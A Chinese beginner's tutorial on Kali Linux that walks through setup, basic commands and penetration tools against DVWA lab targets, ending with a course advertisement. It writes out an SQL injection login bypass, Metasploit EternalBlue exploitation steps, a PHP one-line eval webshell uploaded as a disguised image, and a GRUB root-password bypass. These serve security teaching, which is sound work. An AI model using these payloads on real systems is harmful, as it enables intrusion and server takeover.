当前位置: 首页 > news >正文

收藏这篇就够了!新手学习 Kali Linux 全指南,避开九成弯路从入门到实战

前言:

当你花了 2 个小时在虚拟机里装好了 Kali Linux—看到屏幕上弹出黑色的终端界面,光标闪烁着 “root@kali:~#” 时,你会不会慌乱?接下来该输什么命令?这些工具怎么用?网上说的 “用 Kali 挖漏洞”,到底从哪下手?

很多人入门黑客第一步就是学Kali,但却连 “终端和 CMD 的区别” 都不知道,只会对着满屏的工具图标乱点:点 Nmap 弹出一堆英文参数,点 Burp Suite 不知道怎么抓包,点 SQLMap 连目标 URL 都不会填。几个小时后关掉虚拟机,开始怀疑:“我是不是没天赋学这个?”

其实,90% 的新手学不会 Kali,不是因为难,是把‘从入门到精通’的路,当成了‘打开软件就会’的事。

今天这篇文章,我会把自己踩过的坑、总结的实战技巧,全部分享给你 —— 新手学 Kali,真的不用怕。

第一:Kali 入门第一步:先解决 “新手最痛的 3 个问题”

新手学 Kali,最容易卡在 “安装、联网、记命令” 这三步。我当初因为不会联网,浪费了 2 天时间;因为记不住命令,差点放弃。其实只要找对方法,这些问题 1 小时就能解决。

1. 安装:别纠结 “双系统”,虚拟机是新手最佳选择

很多新手一开始就想装 “双系统 Kali”,觉得 “这样更专业”,结果分区失误导致电脑数据丢失。其实对新手来说,VMware 虚拟机装 Kali才是最优解:不用改硬盘分区,出问题直接删虚拟机,不影响电脑本身。

新手安装避坑指南:
步骤关键操作常见错误解决方法
下载镜像从 Kali 官网(https://www.kali.org/)下载 “64-bit VMWARE” 镜像下成 “Live 镜像” 或 “其他虚拟机镜像”认准 “VMWARE” 标识,镜像名带 “vmware-amd64”
导入虚拟机打开 VMware,选择 “打开虚拟机”,加载下载的镜像导入后提示 “硬件不兼容”编辑虚拟机设置,将 “兼容性” 改为自己 VMware 版本(如 17.x)
初始登录用户名 “kali”,密码 “kali”(默认账号密码)忘记密码或登录后黑屏重启虚拟机,在 GRUB 界面按 “e”,添加 “init=/bin/bash”,进入单用户模式改密码

我的经验:第一次安装不用改任何配置,默认的 2 核 CPU、4G 内存、20G 硬盘足够新手使用。等后期用熟练了,再根据需要增加内存(比如加到 8G)。

2. 联网:解决 “能连 WiFi 但上不了网” 的新手噩梦

我当初安装后,发现 Kali 能连 WiFi,但打开浏览器却加载不出网页,查了半天才知道是 “DNS 配置问题”。新手联网遇到问题,按这 3 步排查,90% 能解决:

联网问题排查流程:
  1. 检查 IP 地址:打开终端,输入ip a(查看网络接口),看是否有 “inet” 开头的 IP(如 192.168.1.100)。如果没有,说明没获取到 IP,重启网络:sudo systemctl restart NetworkManager

  2. 测试网关连通性:输入ping 192.168.1.1(替换成你家路由器的网关,一般是 192.168.1.1 或 192.168.0.1)。如果 ping 不通,检查虚拟机网络模式(新手选 “NAT 模式”,能直接用主机的网络)。

  3. 配置 DNS:

    如果能 ping 通网关但上不了网,是 DNS 的问题。编辑 DNS 配置文件:

    sudo nano /etc/resolv.conf

    添加两行:

    nameserver 8.8.8.8 # 谷歌DNS nameserver 114.114.114.114 # 国内DNS

    Ctrl+O

    保存,

    Ctrl+X

    退出,再 ping 百度测试:

    ping www.baidu.com

    能收到回复就是联网成功。

3. 记命令:别死记硬背,先掌握 “10 个高频命令”

新手最怕记命令,其实 Kali 常用命令就 10 个,先学会这些,足够应对 80% 的基础操作:

命令作用新手实战场景
ls查看当前目录文件装完工具后,用ls看工具是否在目录里
cd切换目录cd /usr/share/nmap进入 Nmap 工具目录
sudo以管理员权限执行命令改配置文件时,用sudo nano 文件名
apt install 工具名安装工具缺某个工具时,用sudo apt install sqlmap安装
ping 目标IP测试网络连通性扫描前用ping 192.168.1.10看目标是否在线
nmap 目标IP端口扫描nmap 192.168.1.10看目标开放了哪些端口
ifconfig/ip a查看本机 IP连不上靶场时,用ip a看自己的 IP 是否和靶场在同一网段
clear清空终端命令太多看不清时,用clear清屏
cp 源文件 目标路径复制文件把漏洞 POC 复制到桌面:cp /root/poc.py /root/Desktop/
rm 文件名删除文件删除没用的日志:rm /var/log/test.log

记命令技巧:把这 10 个命令写在便利贴上,贴在电脑旁边,用的时候看一眼,3 天就能记住。比如每次打开终端,先输clear清屏,再输ip a查 IP,重复几次就熟了。

第二:新手必学的 5 类 Kali 核心工具:从 “会打开” 到 “能实战”

Kali 里有 300 + 工具,但新手不用全学,先聚焦 “信息收集、漏洞扫描、漏洞利用、Webshell 管理、内网渗透” 这 5 类核心工具,每个工具学 “最常用的 2-3 个功能”,就能满足脚本小子的实战需求。

1. 信息收集工具:搞懂 “目标是谁、开了哪些门”

信息收集是黑客的第一步 —— 不知道目标的 IP、端口、服务,后续就没法挖漏洞。新手重点学Nmap(端口扫描)和OneForAll(子域名收集)。

(1)Nmap:新手必学的 “端口扫描神器”

Nmap 的功能很多,但新手只要会 3 个命令,就能搞定基础扫描:

新手实战任务:用 Nmap 扫描自己的 DVWA 靶场 IP(比如 192.168.1.12),找出开放的 80 端口(Web 服务)和 3306 端口(MySQL 数据库),记录服务版本。

(2)OneForAll:子域名收集 “效率工具”

如果目标是一个网站(比如test.com),光扫主域名不够,还要找子域名(比如admin.test.comblog.test.com),这些子域名往往防护更弱。OneForAll 是 Kali 自带的子域名收集工具,新手只要输 1 条命令:

工具会自动从 20 + 平台(如 DNS 查询、搜索引擎)收集子域名,结果保存在/root/OneForAll/results/目录下,打开 CSV 文件就能看到所有子域名和对应的 IP。

2. 漏洞扫描工具:让 “漏洞自己浮出水面”

新手手动找漏洞效率低,用扫描工具能快速发现目标的基础漏洞。重点学Burp Suite(抓包改包)和Xray(自动化漏洞扫描)。

(1)Burp Suite:Web 漏洞测试 “万能工具”

Burp Suite 是新手必须掌握的工具,核心用 “Proxy(代理)” 和 “Repeater(重放)” 功能,步骤如下:

  1. 配置代理:打开 Burp,在 “Proxy→Intercept” 里点击 “Open Browser”,会弹出一个内置浏览器。
  2. 抓包:用内置浏览器访问 DVWA 靶场的登录页,输入账号密码点击登录,Burp 会拦截到登录请求(Intercept 显示 “Intercepted”)。
  3. 改包测试:把拦截到的请求发送到 Repeater(右键→Send to Repeater),在 Repeater 里修改 “username” 参数(比如把admin改成admin' or 1=1#),点击 “Send”,看响应是否返回管理员信息(测试 SQL 注入漏洞)。

新手实战任务:用 Burp 抓 DVWA 登录请求,修改username参数为admin' or 1=1#,成功登录管理员后台。

(2)Xray:自动化扫描 “懒人神器”

Xray 能自动扫描 Web 漏洞(如 SQL 注入、XSS、文件上传),新手用 “被动扫描” 模式(不主动发请求,只分析 Burp 拦截的流量),步骤:

  1. 启动 Xray 代理:./xray_linux_amd64 webscan --listen 127.0.0.1:8081 --html-output xray-result.html(在 Xray 目录下执行,Kali 默认路径/usr/share/xray/
  2. 配置 Burp 上游代理:在 Burp 的 “Proxy→Options→Upstream Proxy Servers” 里,添加 “127.0.0.1:8081”,让 Burp 把流量转发给 Xray。
  3. 浏览目标:用 Burp 内置浏览器访问 DVWA,点击各个功能模块(如 SQL Injection、XSS),Xray 会自动分析流量,生成漏洞报告(xray-result.html)。
3. 漏洞利用工具:从 “发现漏洞” 到 “拿下目标”

找到漏洞后,需要用工具利用漏洞获取权限。新手重点学SQLMap(SQL 注入利用)和Metasploit(漏洞 exp 利用)。

(1)SQLMap:SQL 注入 “终极工具”

新手不用懂复杂的注入原理,用 SQLMap 能自动利用 SQL 注入漏洞,导出数据库数据。核心命令:

新手实战任务:用 SQLMap 导出 DVWA 的 users 表,获取admin账号的密码(默认加密后的密码是5f4dcc3b5aa765d61d8327deb882cf99,解密后是password)。

(2)Metasploit:漏洞 exp “武器库”

Metasploit 里有 1000 + 漏洞的 exp(漏洞利用代码),新手用它来利用已知漏洞(比如永恒之蓝漏洞)。以利用 Windows 的永恒之蓝漏洞为例:

  1. 启动 Metasploit:msfconsole
  2. 搜索 exp:search ms17-010(ms17-010 是永恒之蓝漏洞的编号)
  3. 加载 exp:use exploit/windows/smb/ms17_010_eternalblue
  4. 设置目标 IP:set RHOSTS 192.168.1.20(目标 Windows 机器的 IP)
  5. 执行攻击:run,成功后会拿到目标的 shell(显示 “Meterpreter session 1 opened”)
4. Webshell 管理工具:“控制目标” 的最后一步

如果通过文件上传漏洞拿到了 Webshell(比如一句话木马),需要用工具连接管理。新手重点学蚁剑(图形化管理,简单直观)。

蚁剑使用步骤:
  1. 准备 Webshell:在 DVWA 的文件上传模块(Low 难度),上传一个 “图片马”(把<?php @eval($_POST['cmd']);?>写入图片文件,改后缀为.php)。
  2. 打开蚁剑:Kali 里搜索 “AntSword”,打开后点击 “添加数据”。
  3. 配置连接:
    • URL:上传的 Webshell 路径(比如http://192.168.1.12/dvwa/hackable/uploads/shell.php
    • 密码:cmd(和 Webshell 里的$_POST['cmd']对应)
  4. 连接:点击 “测试连接”,显示 “连接成功” 后,就能管理目标服务器(比如浏览文件、执行命令)。
5. 内网渗透工具:“突破边界” 的基础工具

如果拿下了目标的边界服务器(比如 Web 服务器),还需要渗透内网。新手重点学Cobalt Strike(简称 CS,内网协作工具),但 CS 需要破解版或授权,新手先学基础的 “内网信息收集” 命令:

第三:成为 “合格脚本小子” 的 3 个关键:避开误区,合法实战

很多新手以为 “会用工具就是脚本小子”,结果要么乱用工具违法,要么只会点几下鼠标,遇到问题就卡壳。其实合格的脚本小子,要满足 3 个条件:会用工具 + 懂基础原理 + 合法实战

1. 误区 1:“只会点工具,不懂原理”—— 永远停留在 “入门”

我当初用 SQLMap 跑通注入后,以为自己 “会黑客技术了”,直到有人问 “为什么输入' or 1=1#能登录”,我答不上来。后来才明白,脚本小子不能只 “知其然”,还要 “知其所以然”。

新手必懂的 3 个基础原理:

学习方法:学完一个工具后,花 10 分钟查 “这个工具利用的漏洞原理是什么”,比如用 SQLMap 后,查 “SQL 注入原理”;用蚁剑后,查 “一句话木马的工作原理”。

2. 误区 2:“乱扫真实网站,触碰法律红线”—— 前途尽毁

我在学 Nmap 时,一时好奇扫描了小区物业的官网,结果第二天收到网警电话,警告我 “未经授权的网络扫描属于违法行为”。新手一定要记住:所有实战必须在合法场景下进行,否则轻则罚款拘留,重则承担刑事责任。

新手合法实战的 3 个渠道:
3. 误区 3:“追求‘高大上’工具,忽视基础操作”

新手总喜欢装各种 “炫酷工具”(比如自动挖洞脚本、破解版 CS),结果连 Nmap 的基础参数都记不住。其实对脚本小子来说,把基础工具用熟,比装 100 个工具更有用

新手工具学习原则:

第四:脚本小子的进阶方向:从 “会用工具” 到 “能解决问题”

成为合格脚本小子后,不要满足于 “点几下工具”,要向 “能独立挖漏洞、解决实际问题” 的方向进阶。我总结了 3 个进阶步骤,帮你为以后成为渗透测试工程师打基础:

1. 第一步:从 “靶场” 到 “SRC”,积累真实漏洞经验

靶场的漏洞都是 “预设好的”,而真实环境的漏洞需要自己找。新手可以从 SRC 平台入手,提交简单的漏洞(如 XSS、信息泄露),步骤:

  1. 选低门槛 SRC:比如补天平台的 “新手专区”,里面的目标防护弱,容易出成果;
  2. 定测试范围:只测试平台列出的 “允许测试域名”,不越界;
  3. 写漏洞报告:包含 “漏洞位置、利用步骤、危害说明、修复建议”,附截图证明(比如 XSS 漏洞,附弹出警告框的截图)。

我第一次在 SRC 提交的是 “某网站登录页的反射型 XSS 漏洞”,虽然只是低危漏洞,但拿到了平台的 “漏洞确认” 邮件,这是我第一次感受到 “用技术创造价值” 的成就感。

2. 第二步:学 “简单编程”,提升工具使用效率

脚本小子不用成为 “程序员”,但要会写简单的脚本,解决重复工作。比如用 Python 写一个 “批量检测 XSS 漏洞” 的脚本,步骤:

  1. 学 Python 基础:重点学requests库(发 HTTP 请求)和re库(正则匹配);
  2. 写脚本逻辑:遍历目标 URL 列表,往参数里插入<script>alert('XSS')</script>,判断响应是否包含插入的脚本;
  3. 测试脚本:用 DVWA 的 XSS 模块测试,看脚本是否能成功检测到漏洞。

推荐学习资源:CSDN 上的《Python 安全编程入门》系列文章,重点看 “HTTP 请求”“正则匹配” 章节,1 周就能上手写简单脚本。

3. 第三步:了解 “安全合规”,避免踩法律坑

进阶后会接触更多真实项目,必须懂 “安全合规”—— 知道哪些能做,哪些不能做。新手重点了解 2 个法规:

结语:新手学 Kali,最需要的不是 “天赋”,是 “耐心”

回望我学 Kali 的 3 个月,从 “对着终端发呆” 到 “用 SQLMap 导出数据库”,从 “不敢实战” 到 “提交 SRC 漏洞”,最大的感悟是:新手学 Kali,没有 “一步登天” 的捷径,只有 “循序渐进” 的踏实

如果你现在打开 Kali 还是会懵,别慌 —— 先学会 “输对第一条命令”,再学会 “用 Nmap 扫第一个端口”,接着学会 “用 SQLMap 跑第一个注入”。每完成一个小目标,你就离 “合格脚本小子” 近一步。

最后提醒你:脚本小子不是 “黑客的终点”,而是 “安全学习的起点”。当你能用工具解决真实问题,能懂漏洞原理,能合法实战时,你就已经超越了 90% 的新手 —— 而这,正是成为渗透测试工程师的基础。

现在,打开你的 Kali 虚拟机,输入第一条命令吧 —— 未来的你,会感谢现在开始行动的自己。

学习资源


如果你也是零基础想转行网络安全,却苦于没系统学习路径、不懂核心攻防技能?光靠盲目摸索不仅浪费时间,还消磨自己信心。这份 360 智榜样学习中心独家出版《网络攻防知识库》专为转行党量身打造!

01内容涵盖

这份资料专门为零基础转行设计,19 大核心模块从 Linux系统、Python 基础、HTTP协议等地基知识到 Web 渗透、代码审计、CTF 实战层层递进,攻防结合的讲解方式让新手轻松上手,真实实战案例 + 落地脚本直接对标企业岗位需求,帮你快速搭建转行核心技能体系!

这份完整版的网络安全学习资料已经上传CSDN【保证100%免费】

**读者福利 |***CSDN大礼包:《网络安全入门&进阶学习资源包》免费分享 *(安全链接,放心点击)

02 知识库价值

03 谁需要掌握本知识库

04部分核心内容展示

360智榜样学习中心独家《网络攻防知识库》采用由浅入深、攻防结合的讲述方式,既夯实基础技能,更深入高阶对抗技术。

内容组织紧密结合攻防场景,辅以大量真实环境复现案例、自动化工具脚本及配置解析。通过策略讲解、原理剖析、实战演示相结合,是你学习过程中好帮手。

1、网络安全意识

2、Linux操作系统

3、WEB架构基础与HTTP协议

4、Web渗透测试

5、渗透测试案例分享

6、渗透测试实战技巧

7、攻防对战实战

8、CTF之MISC实战讲解

这份完整版的网络安全学习资料已经上传CSDN【保证100%免费】

**读者福利 |***CSDN大礼包:《网络安全入门&进阶学习资源包》免费分享 ***(安全链接,放心点击)**

本文转自网络如有侵权,请联系删除。

http://www.jsqmd.com/news/823098/

相关文章:

  • 2026南京晚上游攻略:从“0点博物馆”到璀璨秦淮,越夜越精彩 - 深度智识库
  • 广州猎头公司哪家好?专注财务总监、人资总监、各类研发/工程师岗,推荐南方新华猎头公司 - 榜单推荐
  • 3步解锁中文BurpSuite:打造无障碍安全测试工作流
  • QModMaster实战指南:5个高效ModBus调试技巧深度解析
  • SEB虚拟化绕过技术深度解析:构建安全考试环境研究平台
  • 构建高效热铆焊接产线:设备选型与品牌技术评估实用指南 - 速递信息
  • 2026年企业制品管理平台选型推荐:Gitee Repo 如何构建安全高效协作基石
  • 从原理到实战:手把手教你设计与调校八木天线
  • Spring Boot项目里application.properties突然不提示了?别慌,试试这3个排查步骤(附Idea 2023.3+版本截图)
  • 2026AI搜索推广公司排名石家庄企业拓展业务的有效解决方案 - 品牌企业推荐师(官方)
  • 不止于Docker Hub:在KubeSphere中统一管理你的多源镜像仓库(实战Docker Registry与Harbor)
  • 揭秘Windows防休眠核心技术:MouseJiggler深度解析与实战应用
  • 2026年俄罗斯劳保展BIOT - 中国组团单位- 新天国际会展 - 新天国际会展
  • STFT音高迁移:C++实现音频变调不变速的核心原理与工程实践
  • 2026 上海游艇租赁怎么选?派对团建商务托管一站式避坑指南 - 行情观察室
  • 南京靠谱婚恋门店推荐|南京合欢囍,本土中高端平台 - 品牌企业推荐师(官方)
  • 用Python和PyQUBO搞定整数分割问题:从Ising模型到QUBO矩阵的保姆级实战
  • LaTeX-PPT:PowerPoint公式编辑效率提升400%的终极解决方案
  • MPICH2并行计算环境搭建:从“目标计算机积极拒绝”到畅通无阻的实战排错指南
  • 提示词不是堆砌!揭秘MJ底层解析器如何逐层拆解“/describe输出→token分词→权重归一化→CLIP embedding映射”全过程
  • LinkSwift:九大网盘直链下载的技术革新与优雅突围
  • 破解景点检票运营困局:4S优化方法论如何提升效率与稳定性? - 速递信息
  • 2026 年 5 月华硕售后网点地址核验报告 - 品牌企业推荐师(官方)
  • Django应用健康检查实战:从原理到K8s集成与安全加固
  • 四川扫地机器人维修全攻略:从常见故障到优质服务商一网打尽 - 深度智识库
  • IDEA 2023.3 新特性尝鲜与一站式安装配置指南(图文详解)
  • 再生塑料颗粒厂家怎么选?常州通腾塑业的实战经验与案例拆解 - 企师傅推荐官
  • 2026年天然香杉木做的板材品牌推荐,雪宝板材怎么样? - myqiye
  • 终极HsMod炉石传说模改插件完整指南:提升300%游戏体验的简单方案
  • 终极数据恢复指南:TestDisk PhotoRec 免费开源解决方案